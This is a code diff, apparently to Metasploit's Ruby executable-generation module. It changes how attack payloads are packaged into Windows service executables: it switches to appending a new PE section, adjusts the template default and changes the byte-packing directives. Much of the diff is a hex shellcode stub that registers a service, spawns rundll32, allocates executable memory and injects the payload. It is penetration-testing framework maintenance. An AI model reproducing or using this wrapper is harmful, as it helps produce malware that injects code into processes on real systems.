@@ -525,9 +525,6 @@ def self.to_win64pe(framework, code, opts = {})
525525 return injector . generate_pe
526526 end
527527
528- #opts[:exe_type] = :exe_sub
529- #return exe_sub_method(code,opts)
530-
531528 # Append a new section instead
532529 appender = Msf ::Exe ::SegmentAppender . new ( {
533530 :payload => code ,
@@ -549,9 +546,9 @@ def self.to_win64pe(framework, code, opts = {})
549546 #
550547 # @return [String] Windows Service PE file
551548 def self . to_win32pe_service ( framework , code , opts = { } )
549+ set_template_default ( opts , "template_x86_windows_svc.exe" )
552550 if opts [ :sub_method ]
553551 # Allow the user to specify their own service EXE template
554- set_template_default ( opts , "template_x86_windows_svc.exe" )
555552 opts [ :exe_type ] = :service_exe
556553 return exe_sub_method ( code , opts )
557554 else
@@ -591,26 +588,31 @@ def self.to_win32pe_service(framework, code, opts = {})
591588 "\x5B \x5B \x61 \x59 \x5A \x51 \xFF \xE0 \x58 \x5F \x5A \x8B \x12 \xEB \x86 \x5D " +
592589 "\x6A \x00 \x68 \x70 \x69 \x33 \x32 \x68 \x61 \x64 \x76 \x61 \x54 \x68 \x4C \x77 " +
593590 "\x26 \x07 \xFF \xD5 #{ pushed_service_name } \x89 \xE1 " +
594- "\x8D \x85 #{ [ svcmain_code_offset ] . pack ( '<I ' ) } \x6A \x00 \x50 \x51 \x89 \xE0 \x6A \x00 \x50 \x68 " +
591+ "\x8D \x85 #{ [ svcmain_code_offset ] . pack ( 'I< ' ) } \x6A \x00 \x50 \x51 \x89 \xE0 \x6A \x00 \x50 \x68 " +
595592 "\xFA \xF7 \x72 \xCB \xFF \xD5 \x6A \x00 \x68 \xF0 \xB5 \xA2 \x56 \xFF \xD5 \x58 " +
596593 "\x58 \x58 \x58 \x31 \xC0 \xC3 \xFC \xE8 \x00 \x00 \x00 \x00 \x5D \x81 \xED " +
597- "#{ [ hash_code_offset ] . pack ( '<I ' ) + pushed_service_name } \x89 \xE1 \x8D " +
598- "\x85 #{ [ svcctrlhandler_code_offset ] . pack ( '<I ' ) } \x6A \x00 \x50 \x51 \x68 \x0B \xAA \x44 \x52 \xFF \xD5 " +
594+ "#{ [ hash_code_offset ] . pack ( 'I< ' ) + pushed_service_name } \x89 \xE1 \x8D " +
595+ "\x85 #{ [ svcctrlhandler_code_offset ] . pack ( 'I< ' ) } \x6A \x00 \x50 \x51 \x68 \x0B \xAA \x44 \x52 \xFF \xD5 " +
599596 "\x6A \x00 \x6A \x00 \x6A \x00 \x6A \x00 \x6A \x00 \x6A \x00 \x6A \x04 \x6A \x10 " +
600597 "\x89 \xE1 \x6A \x00 \x51 \x50 \x68 \xC6 \x55 \x37 \x7D \xFF \xD5 \x31 \xFF \x6A " +
601598 "\x04 \x68 \x00 \x10 \x00 \x00 \x6A \x54 \x57 \x68 \x58 \xA4 \x53 \xE5 \xFF \xD5 " +
602599 "\xC7 \x00 \x44 \x00 \x00 \x00 \x8D \x70 \x44 \x57 \x68 \x2E \x65 \x78 \x65 \x68 " +
603600 "\x6C \x6C \x33 \x32 \x68 \x72 \x75 \x6E \x64 \x89 \xE1 \x56 \x50 \x57 \x57 \x6A " +
604601 "\x44 \x57 \x57 \x57 \x51 \x57 \x68 \x79 \xCC \x3F \x86 \xFF \xD5 \x8B \x0E \x6A " +
605- "\x40 \x68 \x00 \x10 \x00 \x00 \x68 #{ [ code . length ] . pack ( '<I ' ) } \x57 \x51 \x68 \xAE \x87 " +
602+ "\x40 \x68 \x00 \x10 \x00 \x00 \x68 #{ [ code . length ] . pack ( 'I< ' ) } \x57 \x51 \x68 \xAE \x87 " +
606603 "\x92 \x3F \xFF \xD5 \xE8 \x00 \x00 \x00 \x00 \x5A \x89 \xC7 \x8B \x0E \x81 \xC2 " +
607- "#{ [ shellcode_code_offset ] . pack ( '<I ' ) } \x54 \x68 #{ [ code . length ] . pack ( '<I ' ) } +
604+ "#{ [ shellcode_code_offset ] . pack ( 'I< ' ) } \x54 \x68 #{ [ code . length ] . pack ( 'I< ' ) } +
608605 "\x52 \x50 \x51 \x68 \xC5 \xD8 \xBD \xE7 \xFF " +
609606 "\xD5 \x31 \xC0 \x8B \x0E \x50 \x50 \x50 \x57 \x50 \x50 \x51 \x68 \xC6 \xAC \x9A " +
610607 "\x79 \xFF \xD5 \x8B \x0E \x51 \x68 \xC6 \x96 \x87 \x52 \xFF \xD5 \x8B \x4E \x04 " +
611608 "\x51 \x68 \xC6 \x96 \x87 \x52 \xFF \xD5 #{ code_service_stopped }
612609
613- to_winpe_only ( framework , code_service + code , opts )
610+ # Append a new section to the template
611+ Msf ::Exe ::SegmentAppender . new ( {
612+ :payload => code_service + code ,
613+ :template => opts [ :template ] ,
614+ :arch => :x86
615+ } ) . generate_pe
614616 end
615617 end
616618
0 commit comments